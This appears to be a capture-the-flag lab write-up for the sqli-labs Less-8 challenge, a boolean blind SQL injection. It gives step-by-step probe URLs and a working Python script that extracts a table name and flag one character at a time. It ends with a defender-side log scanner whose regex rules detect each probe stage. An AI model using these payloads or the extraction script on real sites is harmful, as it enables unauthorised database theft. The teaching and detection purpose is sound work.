Less-8
Less-8 GET - Blind - Boolean Based - Single Quotes (boolean-based, single-quote GET blind injection)
1. Check whether the parameter is injectable
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1'
Error response => injectable
2. Determine the parameter type
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1 and 1=2
Normal response => string type (the appended condition is swallowed by the quoted value, so it is not a numeric parameter)
3. Close the quote around the parameter
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=2 --+
Error response
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' and 1=1 --+
Normal response => the quote is closed correctly
4. Find how many columns the table behind this page has
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 3 --+
Normal response
https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/?id=1' order by 4 --+
Error response => 3 columns
5. Boolean-based blind injection
Python script

import requests
import time

a = time.time()
c = ''


def table_name():
    a = ''
    global c
    for i in range(1, 9):
        # printable range 48 ~ 122
        low = 48
        high = 122
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))>%d -- 1 " % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:
                # greater than mid: raise low to mid + 1 and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:
                # not greater, so less than or equal; ask "less than?" first, and if not, it must be equal
                payload = "?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),%d,1))<%d -- 1" % (i, mid)
                # submit this variant
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:
                    # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recompute mid
                    continue
                else:
                    # only "equal" remains
                    a = a + chr(mid)
                    break
    print('table_name:' + a)
    c = a


def flag():
    a = ''
    for i in range(1, 43):
        # search range 1 ~ 128
        low = 1
        high = 128
        mid = int((low + high) / 2)
        while True:
            payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))>%d -- 1" % (i, mid)
            r = requests.get(url=urls + payload)
            # print(urls+payload)
            if "You are in" in r.text:
                # greater than mid: raise low to mid + 1 and keep searching
                low = mid + 1
                mid = int((low + high) / 2)
                continue
            else:
                # not greater, so less than or equal; ask "less than?" first, and if not, it must be equal
                payload = "?id=1' and ascii(substr((select flag from " + c + " limit 3,1),%d,1))<%d -- 1" % (i, mid)
                # submit this variant
                r = requests.get(url=urls + payload)
                if "You are in" in r.text:
                    # "less than" holds
                    high = mid - 1
                    mid = int((low + high) / 2)  # recompute mid
                    continue
                else:
                    # only "equal" remains
                    a = a + chr(mid)
                    print(a)
                    break
    print('flag:' + a)


if __name__ == '__main__':
    urls = 'https://636-2c32225c-0e0d-47aa-8a00-7193be3f88e2.do-not-trust.hacking.run/'
    # database_name()
    table_name()
    # once the database name is known, adjust the code above accordingly and run it
    # column_name()
    flag()
    b = time.time()
    print('Binary search: Running time: %s Seconds' % (b - a))
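As an added, defender-side example that is not part of the original writeup: a small Python log scanner that recognises the probe patterns from steps 1 to 5 above in web-server access-log lines and counts flagged requests per client, since a boolean blind extraction like the script above produces a long burst of near-identical requests from one source. The log lines, client IPs, timestamps and rule names are constructed for this example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed Apache-style access-log lines mirroring the probes in the
# Less-8 walkthrough above (client IPs, host and timestamps are made up).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /?id=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:01 +0000] "GET /?id=1' HTTP/1.1" 200 480
10.0.0.5 - - [01/Jan/2024:12:00:02 +0000] "GET /?id=1'%20and%201=1%20--+ HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:12:00:03 +0000] "GET /?id=1'%20order%20by%204%20--+ HTTP/1.1" 200 480
10.0.0.5 - - [01/Jan/2024:12:00:04 +0000] "GET /?id=1'%20and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1),1,1))>85%20--%201 HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:12:00:05 +0000] "GET /?id=2 HTTP/1.1" 200 512
"""

# One rule per step of the walkthrough; applied to the decoded, lowercased query string.
RULES = {
    "quote_probe":  re.compile(r"=\d+'(\s|$)"),             # step 1: stray quote after a numeric value
    "tautology":    re.compile(r"\band\s+1\s*=\s*[12]\b"),  # steps 2/3: and 1=1 / and 1=2
    "column_count": re.compile(r"\border\s+by\s+\d+"),      # step 4: order by N
    "char_extract": re.compile(r"ascii\s*\(\s*substr"),     # step 5: byte-wise comparison
    "schema_enum":  re.compile(r"information_schema"),      # step 5: table-name lookup
    "comment_tail": re.compile(r"--(\s|\+|$)"),             # comment terminator used in steps 3-5
}

# Common-log-format prefix: client, identd, user, [timestamp], "METHOD target HTTP/x.y"
REQ_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')


def classify_request(target: str) -> list:
    """Return the names of every rule matching the URL-decoded query string of one request."""
    query = unquote_plus(target.partition("?")[2]).lower()
    return [name for name, rx in RULES.items() if rx.search(query)]


def scan_log(text: str) -> list:
    """Return (client_ip, tags) for every request that trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = REQ_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        ip, target = m.groups()
        tags = classify_request(target)
        if tags:
            hits.append((ip, tags))
    return hits


def suspects(text: str, min_hits: int = 2) -> dict:
    """Count flagged requests per client; a binary-search extraction yields hundreds."""
    counts = Counter(ip for ip, _ in scan_log(text))
    return {ip: n for ip, n in counts.items() if n >= min_hits}
```

Running `suspects(SAMPLE_LOG)` on the constructed lines flags only 10.0.0.5, with four tagged requests; raise `min_hits` to match the request volume the extraction script above actually generates.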
